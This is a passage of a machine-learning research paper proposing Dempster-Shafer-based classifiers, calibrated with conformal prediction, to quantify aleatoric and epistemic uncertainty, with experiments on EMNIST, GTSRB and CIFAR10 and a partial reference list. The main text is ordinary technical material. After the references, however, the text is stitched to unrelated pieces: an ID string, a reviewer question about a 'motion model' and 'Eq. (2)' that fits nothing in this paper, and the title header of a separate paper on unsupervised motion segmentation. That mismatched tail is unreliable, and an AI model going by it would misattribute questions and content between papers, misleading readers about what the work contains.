While being a reasonable starting point, there are indications that standard probabilistic models are often poorly calibrated (Guo et al., 2017), meaning that their output frequently does not accurately represent the true likelihood of the outcomes. To overcome this issue, several calibration methods exist, among which temperature scaling of the softmax parameter, introduced in Guo et al. (2017), and its extensions (Ji et al., 2019; Yu et al., 2022; Joy et al., 2023) are among the most prominent post-processing techniques. Moreover, probabilistic approaches come with the drawback of not being able to distinguish between aleatoric and epistemic uncertainty. For certain applications, however, a distinction would be essential, especially when decisions can be rejected or delayed (Chow, 1970), or in active learning scenarios (Aggarwal et al., 2014).

More sophisticated techniques, such as BNNs or ensemble methods like Monte Carlo dropout (Gal & Ghahramani, 2016) or bagging techniques (Breiman, 1996), are commonly used to capture a more accurate estimation of uncertainty in ML models and also allow drawing a distinction between aleatoric and epistemic uncertainty. At the heart of these methods is a distribution over possible sets of neural network parameters, which is sampled multiple times for each data point during inference, cf. Fig. 1(b)-(c). The epistemic uncertainty is reflected by the variance of this distribution, while the aleatoric uncertainty is defined by the mean. Although this allows a distinction between the sources of uncertainty, those methods are computationally expensive at inference and therefore not suited for some tasks such as autonomous driving.

Figure 1: Probability simplex of three mutually exclusive events, denoted as $A$, $B$, and $C$, for different methods to capture uncertainty: While probabilistic point predictions only reflect aleatoric uncertainty (a), more advanced approaches like ensemble methods provide a measure of epistemic uncertainty in terms of the width of the scatter of the point predictions of multiple ensemble members (b). Similarly, in Bayesian neural networks, the variance of the distribution on the weights captures epistemic uncertainty (c). Yet other approaches, such as DST, provide credal sets whose size represents a measure of epistemic uncertainty (d).

Besides the expression of predictive uncertainty via distributions, there is the possibility of a representation via sets (Grycko, 1993). In our work, we make use of such set-valued predictions, i.e., the model outputs a set of possible labels, with the size of the set being an indicator of its certainty. Within this research area there are again two parallel branches. The first one is a pure post-processing method referred to as conformal prediction (Vovk et al., 2005; Shafer & Vovk, 2008; Balasubramanian et al., 2014), where sets with guaranteed confidence levels are returned. Since we use this method in our work, we formally introduce it in Section 3.2. In the second branch, sets are returned directly from the model. A special case of this is the so-called classification with reject option, where a classifier can express its uncertainty by refusing to classify a specific example (Herbei & Wegkamp, 2006). Other approaches, including our work, predict generalized probabilities for all sets of outcomes, which can be used to construct a credal set, cf. Fig. 1(d),
defined as a convex set of probability distributions over all outcomes (see also Section 3.1 below), or utilize credal sets as a representation of epistemic uncertainty, e.g., Lienen & Hüllermeier (2021). To the best of our knowledge, only a few recent works directly make use of Dempster-Shafer theory to obtain set-valued predictions for quantifying predictive uncertainty. There also exists a rich body of work on belief functions (Cuzzolin, 2014), and a connection between belief functions and conformal prediction has recently been found (Cella & Martin, 2022). Directly constructing outputs according to DST, Manchingal et al. (2023) learn feature vectors to fit Gaussian mixture models (GMMs), aiming to obtain a predetermined number of relevant subsets. The ability of GMMs to represent epistemic uncertainty, however, can be questioned, since they represent data density rather than prediction uncertainty. The most directly related work to the approach presented in this paper is that of Manchingal & Cuzzolin (2022). They propose a neural network that assigns probability values based on the framework of DST to each set of outcomes (i.e., exponentially many values in the number of outcomes) by zero-padding label vectors and standard training. However, as they conclude in their work, this approach is similar to a traditional output in terms of training and validation. Our approach differs from that of Manchingal et al. in that we derive a novel loss function motivated by how uncertainty is represented in DST. Additionally, by modifying the output layer of a common neural network classifier, we are able to solve the scaling problem while still obtaining informative set predictions.

3 PRELIMINARIES

The method developed in this work for quantifying predictive uncertainties is based on the Dempster-Shafer theory of evidence, which has only recently made its way into the uncertainty quantification community (Manchingal & Cuzzolin, 2022). Since the principles of DST are not commonly known, they will be explained for completeness in Section 3.1 below. We combine a classifier based on DST with conformal prediction as a post-processing step, which we elaborate on in Section 3.2.

3.1 Dempster-Shafer Theory of Evidence

Dempster-Shafer theory (DST), sometimes also referred to as the theory of evidence, is a mathematical framework for decision-making in situations where evidence or information is incomplete, imprecise, or conflicting. The fundamental idea is to assign probabilities not to individual outcomes but to sets of outcomes (Dempster, 1967a,b), which addresses a limitation of standard Bayesian probability theory: expressing a state of ignorance, i.e., reflecting what you do not know without the need to commit to a prior. Consider, for instance, tossing a coin which is known to be fair. One would then assign both outcomes, heads and tails, an equal probability of 0.5. If, however, the coin is not known to be fair (and you do not have any further evidence about its state), Bayesian probability theory would still assign a 0.5 probability to both outcomes, whereas DST allows one to express the lack of knowledge by assigning a generalized probability (called a mass function in DST) of 1 to the total set {heads, tails}, without attempting to ascribe probabilities to the options fair and not fair.
**Definition 1** Consider a so-called frame of discernment \( \Theta = \{X_1, X_2, \ldots, X_n\} \), which is a set of \( n \) mutually exclusive outcomes of the system under consideration. A basic probability assignment over \( \Theta \), hereafter simply denoted as mass function \( m \), is a function that assigns a probability to each element of the powerset of \( \Theta \), i.e., \( m : 2^\Theta \rightarrow [0, 1] \), such that the following two conditions hold:
\[
m(\emptyset) = 0, \qquad \sum_{A \subseteq \Theta} m(A) = 1.
\]
That is, the mass \( m(A) \) expresses how much one believes in precisely the set \( A \) and not in any subset of \( A \). To ease further notation, we call \( \mathbf{m} = (m(\emptyset), m(\{1\}), \ldots, m(\Theta)) \in \mathbb{R}^{2^n} \) the mass vector. Based on the mass, one can derive two other functions over subsets of \( \Theta \), namely belief and plausibility (Shafer, 1990).

**Definition 2** Let \( m \) be a mass function over \( \Theta \). The belief function \( \text{bel} \) and plausibility function \( \text{pl} \) defined on the elements of the powerset \( 2^\Theta \) induced by \( m \) are given by
\[
\text{bel}(A) = \sum_{B \subseteq A} m(B), \qquad \text{pl}(A) = \sum_{B \cap A \neq \emptyset} m(B) = 1 - \text{bel}(\bar{A}) \quad \forall A \subseteq \Theta.
\]
Belief and plausibility fulfill the property \( \text{bel}(A) \leq \text{pl}(A) \) for all \( A \subseteq \Theta \), which is why they are sometimes interpreted as lower and upper probability, respectively, for the particular set of outcomes. Analogously to the mass function, a plausibility and a belief vector can be defined as \( \mathbf{pl} = (\text{pl}(\emptyset), \text{pl}(\{1\}), \ldots, \text{pl}(\Theta)) \) and \( \mathbf{bel} = (\text{bel}(\emptyset), \text{bel}(\{1\}), \ldots, \text{bel}(\Theta)) \). Note that neither \( \mathbf{pl} \) nor \( \mathbf{bel} \) is necessarily normalized.

The plausibility and belief values of the singleton sets in \( 2^\Theta \) define a so-called credal set, which is a convex set of probability distributions over elementary events. The volume of such a convex set can serve as a measure of epistemic uncertainty, cf. Fig. 1(d). That is, once the entire mass vector is known, an estimate of the epistemic uncertainty can be obtained. Recently, it has been mathematically proven that the volume of a credal set is a reliable measure of epistemic uncertainty only in the binary case (Sale et al., 2023), since the volume is zero in higher dimensions if the credal set is not of full dimensionality (in DST this occurs if plausibility and belief of a singleton are equal). Restricting the considerations to credal sets fully defined by their belief and plausibility bounds, alternative measures of epistemic uncertainty could be defined which avoid the collapse issue in higher dimensions. For a single-label classifier, e.g., the mean belief-plausibility gap across all singleton sets could be used as a meaningful measure.

Note that the presented axiomatic formulation of Dempster-Shafer theory follows the approach of Shafer (2008), which is not the only way to roll out DST. In his milestone work (Dempster, 1967), Arthur P. Dempster defined mass, belief, and plausibility functions via a multi-valued map. Other routes include compatibility relations (Shafer, 1987) and random subsets (Nguyen, 1978). We refer the interested reader to Shafer (1990), where an overview of different formalizations is given.
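A minimal sketch (our own, with hypothetical function names) of Definitions 1 and 2, deriving belief and plausibility from a mass function over a small frame:

```python
from itertools import combinations

def powerset(theta):
    """All subsets of theta as frozensets, including the empty set."""
    return [frozenset(c) for r in range(len(theta) + 1)
            for c in combinations(theta, r)]

def belief_plausibility(mass, theta):
    """mass: dict mapping frozenset -> m(A); returns (bel, pl) dicts."""
    bel, pl = {}, {}
    for A in powerset(theta):
        bel[A] = sum(m for B, m in mass.items() if B <= A)  # B subset of A
        pl[A] = sum(m for B, m in mass.items() if B & A)    # B intersects A
    return bel, pl

theta = {"A", "B", "C"}
mass = {frozenset({"A"}): 0.5, frozenset({"A", "B"}): 0.3, frozenset(theta): 0.2}
bel, pl = belief_plausibility(mass, theta)
assert all(bel[A] <= pl[A] for A in bel)  # bel <= pl for every subset
```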
For completeness, we also highlight some criticisms (Zadeh, 1979; Pearl, 1988) and their possible resolutions (Haenni, 2005; Wilson, 1992; Yager, 1987; Smets, 1992; Fixsen, 1997), but we do not utilize these results.

3.2 Conformal Prediction

Conformal prediction (CP) provides a general methodology for prediction tasks, aimed at obtaining instance-wise set predictions with a guaranteed user-specified confidence (Vovk et al., 2005; Papadopoulos et al., 2002; Lei & Wasserman, 2014). It can be employed as a post-hoc calibration step to modify black-box point prediction schemes to produce reliable uncertainty estimates. Consider a model \( \hat{f} \) fitted to the problem under consideration, which outputs a prediction \( \hat{y} \) from the output space \( Y \) given an input \( x \) from the input space \( X \), i.e., \( \hat{y} = \hat{f}(x) \) for true outcome \( y \). Conformal prediction relies on the prescription of a scoring function \( s \) (often also referred to as a non-conformity measure), which quantifies the extent to which the prediction \( \hat{y} \) deviates from the true output \( y \). A common choice of scoring function for a classifier that outputs softmax scores for each class (\( \hat{f}(x) \in [0,1]^k \) for \( k \) different outcomes) is one minus the softmax output of the true class, i.e., \( s(x,y) = 1 - \hat{f}(x)_y \). It is further assumed that there is access to a held-back calibration dataset \( D = \{z_i = (x_i, y_i)\}_{i=1}^n \) of size \( n \). The objective is then to predict a reliable output for a new test sample \( z_{n+1} = (x_{n+1}, y_{n+1}) \), of which the true output is unknown. For this purpose, the following assumption is made.

**Assumption 1** Calibration dataset \( D \) and test sample \( z \) are finitely exchangeable random variables. That is, there exists a joint probability distribution \( p(D,z) \) which is invariant under any permutation \( \pi \) of \( \{1, 2, \ldots, n + 1\} \), i.e.,
\[
p(z_1, z_2, \ldots, z_{n+1}) = p(z_{\pi(1)}, z_{\pi(2)}, \ldots, z_{\pi(n+1)}).
\]
Note that the standard assumption in machine learning of independent and identically distributed (i.i.d.) random variables satisfies Assumption 1. In order to obtain a set predictor \( \tau(x|D) \), given a calibration dataset \( D \) and a user-specified confidence level \( 1 - \alpha \) with \( \alpha \in (0,1) \) (e.g., \( 1 - \alpha = 0.9 \)), the following three steps need to be carried out.

1. Compute non-conformity measures for all samples in the calibration set \( D \), resulting in a set of scores \( \{s(z_i)\}_{i=1}^n \).
2. Compute the \( (1 - \alpha) \)-quantile \( Q_{1-\alpha}(\{s(z_i)\}_{i=1}^n) \) on the set of scores.
3. For a new sample \( z_{n+1} = (x_{n+1}, y_{n+1}) \), obtain the set predictor \( \tau(x_{n+1}|D) \) by including all candidate outputs \( y' \in Y \) whose scores \( s(x_{n+1}, y') \) fall below the \( (1 - \alpha) \)-quantile, i.e.,
\[
\tau(x_{n+1}|D) = \{y' \in Y : s(x_{n+1}, y') \leq Q_{1-\alpha}(\{s(z_i)\}_{i=1}^n)\}
\]
(6)

By following these steps and under Assumption 1, CP guarantees that the set predictor \( \tau(x_{n+1}|D) \) is calibrated, leading to Theorem 1.

**Theorem 1** Under Assumption 1, for any confidence level \( \alpha \in (0,1) \) and for any scoring function \( s \), the set predictor in (6) is well-calibrated, i.e., the probability that the true outcome \( y \) for a given \( x \) is contained in the set is larger than or equal to \( 1 - \alpha \):
\[
p(y \in \tau(x|D)) \geq 1 - \alpha.
\]
A proof of Theorem 1 can be found in Vovk et al. (2005). Since the trivial set \( \tau(x|D) = Y \) is always valid (in the sense that it always contains the true label), the returned set size can be understood as a measure of informativeness of the underlying model \( \hat{f} \), sometimes also denoted as sharpness (Wang et al., 2023). The average set size obtained via CP can therefore be utilized as a quality measure, i.e., an evaluation metric for set predictors. In addition to the generic approach presented here, several extensions to CP exist in the literature, e.g., Bates et al. (2021), where the authors tackle CP for classification problems in which some mistakes are more severe than others, or the work of Mortier et al. (2021), where methods of utility maximization and CP are combined to balance the correctness of the prediction against the set size. In the context of conformal prediction under ambiguous ground truth, it was recently demonstrated by Stutz et al. (2023) that it is necessary to take uncertainty into account during calibration to obtain valid prediction sets, and they introduce a new calibration procedure that accounts for this uncertainty.

4 METHOD

In this section, we develop a method based on DST to capture aleatoric and epistemic uncertainty for classification tasks in ML contexts. Note that recent theoretical results show that a second-order model, i.e., a model capturing a distribution over probabilities, is necessary to represent epistemic uncertainty (Bengs et al., 2022), and that standard training using loss functions without additional assumptions cannot learn epistemic uncertainty (Bengs et al., 2023). By using DST, we fulfill the requirement of utilizing a second-order model. Using an implicit assumption on the presence of epistemic uncertainty in the loss function design enables us to move beyond the latter restriction.

We consider the following learning problem. Given are pairs of i.i.d. samples \((x, y) \in X \times Y\) from a joint probability distribution \(p_{X \times Y}\). We denote by \(x \in X\) an instance from the input space, and \(y \in Y\) is called a label from the label space. Further, let \(Y\) be discrete with \(n\) different labels, i.e., \(Y = \{1, \ldots, n\}\). Our method promotes a basic classifier of any kind into a probabilistic set predictor \(\hat{h}: X \rightarrow 2^Y\) that outputs a mass vector from DST, cf. Fig. 2. The function \(\hat{h}\) is expected to have the property that it assigns higher mass to larger sets for instances \(x\) with high epistemic uncertainty. In cases of high aleatoric uncertainty, \(\hat{h}\) should distribute the mass equally among the respective singleton sets related to the uncertainty. For low predictive uncertainty, the correct singleton set for the label \(y\) belonging to the input \(x\) is supposed to have high mass.

Figure 2: Overview of the general methodology of the DS Classifier. See Fig. 8 in Appendix C for a comparison of both proposed methods.

We employ a neural network with arbitrary architecture except for the output layer and interpret the output of the model as a mass vector. After training on a suitable loss function, e.g., eq. (8), plausibilities of singleton sets are determined from the mass vectors for all samples in the calibration set. Subsequently, a calibration according to CP is performed on the plausibilities of the singleton sets of the true labels.
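To make this step concrete, here is a minimal sketch (our own, with hypothetical names) of the calibration on singleton plausibilities; it uses the fact that scoring with \( s = 1 - \text{pl} \) and thresholding at the \((1-\alpha)\)-quantile of the scores is equivalent to thresholding the plausibilities from below at their \(\alpha\)-quantile:

```python
import numpy as np

def calibrate_quantile(pl_true, alpha):
    """Steps 1-2: scores s = 1 - pl of the true labels on the calibration
    set; the (1 - alpha)-quantile of the scores corresponds to the
    alpha-quantile of the plausibilities themselves."""
    return np.quantile(pl_true, alpha)

def prediction_set(pl_singletons, q):
    """Step 3: keep every label whose singleton plausibility reaches q."""
    return [k for k, p in enumerate(pl_singletons) if p >= q]

# Usage with toy numbers: pl_cal[i] = pl({y_i}) on the calibration set,
# pl_x = singleton plausibilities of the DS Classifier for a new input x.
pl_cal = np.array([0.95, 0.90, 0.85, 0.80, 0.70, 0.99])
q = calibrate_quantile(pl_cal, alpha=0.1)
pl_x = np.array([0.92, 0.15, 0.60, 0.88])
print(prediction_set(pl_x, q))  # labels whose plausibility exceeds the quantile
```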
The difficulty in finding such a model for realistic use cases is that the true uncertainty is in general unknown, let alone its decomposition into aleatoric and epistemic parts. Therefore, we introduce a specific loss function \(L_m\) that uses a trade-off hyperparameter \(\lambda \in [0, 1]\) which, for small (large) values, makes the model tend to put high masses on larger (smaller) sets. Implicitly, this assumes that one is able to estimate how much of the uncertainty should be attributed to aleatoric and epistemic uncertainty during training. While being a strong assumption, we find it relatively unrestrictive in practice and observe improvements without the need to fine-tune \(\lambda\). The loss then takes the form
\[
L_m = (1 - \lambda)\,L_{\mathrm{MSE}_0}(\hat{\mathbf{pl}}, \mathbf{pl}) + \lambda\, L_{\mathrm{MSE}}(\hat{\mathbf{bel}}, \mathbf{bel}).
\]
(8)
Here, \(\hat{\mathbf{pl}}\) and \(\hat{\mathbf{bel}}\) are the plausibility and belief vectors, respectively, that result from the output mass of the model \(\hat{h}\) and are constructed according to eqs. (4) and (5). The vectors \(\mathbf{pl}\) and \(\mathbf{bel}\) are the plausibility and belief vectors resulting from the mass vector which has the entire mass on the singleton set defined by the label \(y\), i.e., \(m(\{y\}) = 1\). Note that the mean squared error (MSE) on the plausibility values has a subscript of 0. By this we indicate a small modification of the standard MSE that replaces all negative entries in the difference \(\mathbf{pl} - \hat{\mathbf{pl}}\) by zero, in order to push more mass onto the larger sets if \(\lambda\) is small. We further want to emphasize that the choice of the loss function is not unique, but the one presented here was found to perform well empirically. In Appendix D, we introduce an alternative training strategy. In particular, it should be mentioned that our method, which we denote as Dempster-Shafer (DS) Classifier from now on, is applicable to arbitrary network architectures if the dimension of the output layer is adjusted to match the dimension resulting from DST.

The exponential scaling of the output layer ultimately limits the applicability of our method to small classification problems. This scaling has previously been addressed by the use of focal sets (Manchingal et al., 2023), which deliberately constrains the frame of discernment (see Def. 1) to the most relevant parts. Here, we propose a restriction useful for the common case of false negative control, by interpreting the outputs of the model directly as the plausibilities of the singleton sets, so that they need not be constructed in a subsequent processing step. The only adjustment to standard models in our second approach is that outputs are not normalized to 1. Instead, we apply a sigmoid function to the output (as opposed to a conventional softmax function). Similarly, for this method, we have constructed a loss function \( L_{pl} \) with hyperparameter \( \lambda \), see eq. (9), that has properties similar to the loss function in (8) (small \( \lambda \) pushes to high plausibilities on all outcomes, large \( \lambda \) to a high plausibility only for the true outcome):
\[
L_{pl} = (1 - \lambda)\, L_{CE}(\hat{p}_{sgl}, p_{sgl}) + \lambda\, L_{MSE}(\hat{p}_{sgl}, p_{sgl}).
\]
(9)
We use \( \hat{p}_{sgl} \) to denote the predicted singleton plausibilities, and \( p_{sgl} \) to indicate the one-hot encoded plausibilities, which have a one in the position of the true label and are zero otherwise.
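As an illustration, a PyTorch-style sketch (our own; the mean reductions are our assumption) of the two loss functions:

```python
import torch
import torch.nn.functional as F

def loss_m(pl_hat, bel_hat, pl, bel, lam):
    """Eq. (8): pl_hat, bel_hat, pl, bel have shape (batch, 2**n).
    MSE_0 zeroes the negative entries of (pl - pl_hat), so over-predicting
    plausibility (i.e., mass on larger sets) is not penalized."""
    mse0 = torch.clamp(pl - pl_hat, min=0.0).pow(2).mean()
    return (1 - lam) * mse0 + lam * F.mse_loss(bel_hat, bel)

def loss_pl(p_sgl_hat, p_sgl, lam, eps=1e-8):
    """Eq. (9): p_sgl_hat are sigmoid outputs of shape (batch, n); p_sgl is
    one-hot. The CE term multiplies wrong-outcome plausibilities by zero,
    so for small lambda high plausibility everywhere goes unpenalized."""
    ce = -(p_sgl * torch.log(p_sgl_hat + eps)).sum(dim=1).mean()
    return (1 - lam) * ce + lam * F.mse_loss(p_sgl_hat, p_sgl)
```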
Intuitively, the cross entropy loss (CE) pushes more weight onto all outcomes, as it does not penalize putting more weight on the plausibilities of the wrong outcomes (they are multiplied by zero due to the one-hot encoding of the label). That is, for \( \lambda = 0 \) the loss function is minimized by every output that predicts a plausibility of 1 on the correct singleton set, regardless of the other predicted plausibilities. In particular, the state of maximum uncertainty, i.e., plausibility of 1 on all singletons, minimizes \( L_{pl} \) for \( \lambda = 0 \). Increasing the \( \lambda \)-parameter in favor of the MSE will lead to a more focused prediction with high plausibility on only one singleton set. We refer to this second approach as DS Classifier (n-dimensional) in the following.

To retrieve set predictions with guaranteed confidence from the DST quantities, we further apply CP to the plausibilities of the singleton sets of the true label of the respective sample, for both proposed approaches (note that we could equivalently do the calibration on one minus the plausibility to match the description in Sec. 3.2). For the standard DS Classifier this implies computing the plausibilities from the mass vector. By calibrating on the plausibilities we achieve false negative (FN) control, as in the inference stage only those labels are included in the prediction set whose plausibility exceeds the previously determined quantile. Note that while we only utilize plausibilities as upper bounds on the probability for FN control here, credal sets are more information-rich and may prove useful for controlling diverse risk functions. It should be emphasized that with our second method we lose the ability to distinguish between aleatoric and epistemic uncertainty, although both types can still be implicitly captured by the same modeling assumptions. Correspondingly, we observe similar behavior for false negative control in the numerical experiments in Section 5 for both the n-dimensional and the standard DS Classifier.

Figure 3: Predicted outputs of the DS Classifier, the n-dimensional DS Classifier and the Softmax Classifier for one illustrative example from the GTSRB dataset without (i.i.d.) and with (o.o.d.) additional noise. The true outcome for this sample is 0. Both DS approaches are more robust under increased epistemic uncertainty for this instance.

If a high level of epistemic uncertainty is prevalent during calibration via CP, a model that is incapable of capturing this type of uncertainty can be expected to frequently attribute high probability to incorrect labels. We illustrate this in Fig. 3, where we compare the outputs of the two proposed DS Classifiers with a standard neural network classifier with softmax activation function in the output layer (denoted as Softmax Classifier) for one specific image from the GTSRB dataset. All classifiers are able to correctly classify the unperturbed image (i.i.d. with the training samples). In situations of high epistemic uncertainty, e.g., if the sample is o.o.d. due to additional perturbation, the Softmax Classifier assigns high probability to the wrong label, while both DS Classifiers assign high mass / plausibility to the correct outcome. Especially for the $n$-dimensional DS Classifier, this example emphasizes the influence of the loss function in eq. (9), which fundamentally distinguishes this approach from the Softmax Classifier (in addition to the modified activation function).
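For concreteness, a sketch (our own, with a hypothetical module name) of how a standard classifier becomes the n-dimensional DS Classifier by swapping the output activation:

```python
import torch
import torch.nn as nn

class NDimDSHead(nn.Module):
    """Standard backbone + linear head, but with a sigmoid instead of a
    softmax: the n outputs need not sum to one and are interpreted directly
    as singleton plausibilities (all close to 1 = maximum uncertainty)."""
    def __init__(self, backbone, feat_dim, n_classes):
        super().__init__()
        self.backbone = backbone
        self.fc = nn.Linear(feat_dim, n_classes)

    def forward(self, x):
        return torch.sigmoid(self.fc(self.backbone(x)))
```

At inference, prediction sets are then obtained by thresholding these outputs at the CP quantile, as in the conformal prediction sketch above.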
Accordingly, a classifier which cannot reliably reflect epistemic uncertainty will calibrate poorly via CP, meaning that a small $(1 - \alpha)$-quantile is obtained and prediction sets become large. We therefore argue that the set size obtained from CP can be utilized as an indication of the model's ability to learn uncertainty.

5 NUMERICAL EXPERIMENTS

In order to assess the capability of our method to capture predictive uncertainties, we employ it on several common datasets and benchmark it against a standard Softmax Classifier with temperature scaling, for which the CP calibration is done on the output of the true class. We conduct experiments on EMNIST (Cohen et al., 2017), GTSRB (Stallkamp et al., 2011) and CIFAR10 (Krizhevsky et al.).

Figure 4: Average size of prediction sets resulting from conformal prediction at different confidence levels for four classes of (a) the EMNIST dataset, (b) the GTSRB dataset and (c) the CIFAR10 dataset, 1) without and 2) with additional perturbations applied to calibration and test images. Both of our proposed methods yield smaller or equally large sets at all confidence levels in the unperturbed case, indicating more informative classifiers compared to the Softmax Classifier at different temperatures. Specifically, at large, application-relevant confidences, the gap in average set size between our approach and the reference method widens. In the scenario of enhanced epistemic uncertainty due to additional perturbation of calibration and test data, average set sizes increase and the difference in set size between the DS Classifiers and the Softmax Classifier grows, indicating that the DS Classifiers capture epistemic uncertainty more reliably.

Our initial tests were conducted on a subset of four classes from each of the above datasets, so as to be able to efficiently apply our first method, whose output layer scales exponentially in the number of classes. Class selection was done such that the learning task is as difficult as possible, i.e., the selected classes are as similar as possible. For instance, for CIFAR10 we choose the subset {airplane, automobile, ship, truck}. All training details can be found in Appendix A. The hyperparameter $\lambda$ in the loss functions (8) and (9) is optimized by means of a basic line search in order to achieve the smallest average set size. We find, however, that the performance is not highly sensitive to $\lambda$, meaning that two different values, for example 0.7 and 0.8, can achieve similarly small average set sizes. Thus, fine-tuning $\lambda$ is not required for the datasets studied. To obtain meaningful results, we analyze the average set size on the test data for all possible confidence levels $(1 - \alpha)$. Note that depending on the size of the calibration dataset, not all confidence levels can be achieved, as the $(1 - \alpha)$-quantile becomes inaccurate with few data and small $\alpha$. We observe that smaller (EMNIST, CIFAR10) or equal (GTSRB) average set sizes can be achieved with the exponentially scaling DS Classifier as well as with the n-dimensional DS Classifier, compared to the Softmax Classifier with varying temperature, cf. Fig. 4. Both EMNIST and GTSRB are not considered complex datasets, and therefore very small prediction sets are obtained with all methods. For the GTSRB dataset we find an average set size smaller than one up to the plotted confidence of 97%.
This can be attributed to a high test (and calibration) accuracy, which implies a $(1 - \alpha)$-quantile close to 1; hence some test samples do not have a score that exceeds it, resulting in an empty prediction set. In order to test the ability of the classifiers to capture epistemic uncertainty, we perturb images in the calibration and test sets by randomly changing the brightness, contrast, saturation and hue of an image (GTSRB, CIFAR10) or by adding Gaussian blur with random variance (EMNIST). The models are still trained on unperturbed data, which effectively implies that calibration and test data are out-of-distribution and hence subject to higher epistemic uncertainty. In this scenario, it can be observed that the average set sizes obtained by CP are greater compared to the unperturbed case, since increased uncertainty results in the need to include more labels in the prediction set to achieve the desired confidence level, see Fig. 4. We further find that both DS Classifiers provide smaller, i.e., more informative, average sets than the Softmax Classifier with varying temperature. Hence, one can conclude that the DS approaches are able to return more reliable predictions in the presence of epistemic uncertainty.

To demonstrate the scalability of the n-dimensional DS Classifier, we next conduct experiments on the full GTSRB dataset with 43 classes. In situations of elevated epistemic uncertainty, obtained by perturbing images in the calibration and test sets, we find that the DS Classifier yields a significantly smaller average set size at all confidence levels compared to the Softmax Classifier, see Fig. 5. In particular, it is notable that the difference increases as the confidence level becomes larger. Achieving smaller average set sizes with the DS approaches compared to a Softmax Classifier with varying temperature, especially in the case of high epistemic uncertainty, supports the theoretical results of Bengs et al. (2022). Adapting the temperature, i.e., calibrating the Softmax Classifier, is found not to be sufficient to reliably reflect epistemic uncertainty and obtain informative set predictions via CP. Hence, we empirically confirm the findings of Stutz et al. (2023) that CP benefits from a non-conformity measure capturing the uncertainty of the data.

6 CONCLUSION

Our work addresses the task of achieving trustworthy predictions in machine learning by estimating predictive uncertainty. We propose the use of classifiers based on the framework of Dempster-Shafer theory to reliably reflect not only aleatoric but also epistemic uncertainty, while still being computationally efficient during inference. By using an implicit assumption on the presence of epistemic uncertainty, we design a loss function to train the DS Classifier and formulate a reduced approach to solve the scaling issue of DST classifiers. Combined with conformal prediction as a post-processing step, we demonstrate empirically on different datasets that, compared to a standard Softmax Classifier with temperature scaling, smaller and hence more informative prediction sets are retrieved, in particular in situations of high epistemic uncertainty. Our work indicates that while conformal prediction can always satisfy coverage guarantees (by returning the trivial set), the quality of the model in capturing uncertainty is crucial to obtain informative set predictions.
Most of the changes that our approach entails compared to Softmax Classifiers are made in the training phase; thus, DS Classifiers may prove to be widely applicable when a characterization of the underlying uncertainties is crucial.

7 REPRODUCIBILITY STATEMENT

Code is made available from the authors upon request. All training details can be found in Appendix A.

REFERENCES

Charu C. Aggarwal, Xiangnan Kong, Quanquan Gu, Jiawei Han, and S Yu Philip. Active Learning: A Survey. In Data Classification: Algorithms and Applications, pp. 571–605. Chapman and Hall/CRC Press, 2014. doi: https://doi.org/10.1201/b17320.

Vineeth Balasubramanian, Shen-Shyang Ho, and Vladimir Vovk. Conformal Prediction for Reliable Machine Learning: Theory, Adaptations and Applications. Newnes, 2014. doi: https://doi.org/10.1016/C2012-0-00234-7.

Stephen Bates, Anastasios Angelopoulos, Lihua Lei, Jitendra Malik, and Michael Jordan. Distribution-Free, Risk-Controlling Prediction Sets. Journal of the ACM (JACM), 68(6):1–34, 2021. doi: https://doi.org/10.1145/3478535. URL https://dl.acm.org/doi/10.1145/3478535.

Viktor Bengs, Eyke Hüllermeier, and Willem Waegeman. Pitfalls of Epistemic Uncertainty Quantification through Loss Minimisation. In Neural Information Processing Systems, 2022. URL https://api.semanticscholar.org/CorpusID:252873697.

Viktor Bengs, Eyke Hüllermeier, and Willem Waegeman. On Second-Order Scoring Rules for Epistemic Uncertainty Quantification. In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), Proceedings of the 40th International Conference on Machine Learning, volume 202 of Proceedings of Machine Learning Research, pp. 2078–2091. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/bengs23a.html.

Leo Breiman. Bagging Predictors. Machine Learning, 24:123–140, 1996. doi: https://doi.org/10.1007/BF00058655. URL https://link.springer.com/article/10.1007/BF00058655.

Leonardo Cella and Ryan Martin. Validity, consonant plausibility measures, and conformal prediction. International Journal of Approximate Reasoning, 141:110–130, 2022. ISSN 0888-613X. doi: https://doi.org/10.1016/j.ijar.2021.07.013. URL https://www.sciencedirect.com/science/article/pii/S0888613X21001195. Probability and Statistics: Foundations and History. In honor of Glenn Shafer.

C. Chow. On Optimum Recognition Error and Reject Tradeoff. IEEE Transactions on Information Theory, 16(1):41–46, 1970. doi: 10.1109/TIT.1970.1054406.

Gregory Cohen, Saeed Afshar, Jonathan Tapson, and André van Schaik. EMNIST: An Extension of MNIST to Handwritten Letters. CoRR, abs/1702.05373, 2017. URL http://arxiv.org/abs/1702.05373.

Giorgio Corani and Marco Zaffalon. Learning Reliable Classifiers From Small or Incomplete Data Sets: The Naive Credal Classifier 2. Journal of Machine Learning Research, 9(4), 2008.

Giorgio Corani and Marco Zaffalon. Lazy Naive Credal Classifier. In Proceedings of the 1st ACM SIGKDD Workshop on Knowledge Discovery from Uncertain Data, U '09, pp. 30–37, New York, NY, USA, 2009. Association for Computing Machinery. ISBN 9781605586755. doi: 10.1145/1610555.1610560. URL https://doi.org/10.1145/1610555.1610560.

Fabio Cuzzolin. Belief Functions: Theory and Applications, volume 8764. September 2014. ISBN 978-3-319-11191-9. doi: 10.1007/978-3-319-11191-9.

A. P. Dempster. Upper and Lower Probabilities Induced by a Multivalued Mapping. The Annals of Mathematical Statistics, 38(2):325–339, 1967a. ISSN 00034851. URL http://www.jstor.org/stable/2239146.
xUe1YqEgd6
What exactly is the motion model? It seems to be some kind of linear decomposition of the optical flow. Is that correct? If so, please clarify and define all notation in Eq. (2); for instance, what is $n$?
UNSUPERVISED MOTION SEGMENTATION IN ONE GO: SMOOTH LONG-TERM MODEL OVER A VIDEO

Anonymous authors Paper under double-blind review

ABSTRACT

